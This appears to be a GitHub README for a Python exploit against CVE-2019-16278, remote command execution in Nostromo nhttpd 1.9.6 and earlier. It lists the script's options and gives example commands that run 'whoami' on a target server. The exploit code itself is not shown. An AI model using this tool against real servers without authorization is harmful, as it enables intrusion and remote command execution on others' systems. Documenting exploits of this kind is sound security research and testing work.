Skip to content

Latest commit

 

History

History
35 lines (25 loc) · 863 Bytes

File metadata and controls

35 lines (25 loc) · 863 Bytes

CVE-2019-16278 - Nostromo 1.9.6 RCE

Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.

Help

usage: CVE-2019-16278.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES]

Exploit for CVE-2019-16278 - Nostromo 1.9.6 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Remote host to target
  -p PORT, --port PORT  Remote port to target
  -c COMMAND, --command COMMAND
                        Command to execute on the server
  -b BYTES, --bytes BYTES
                        The number of bytes to receive back in the response

Usage

Run the exploit

python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami

Run the exploit and recieve more bytes in the response

python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami -b 4096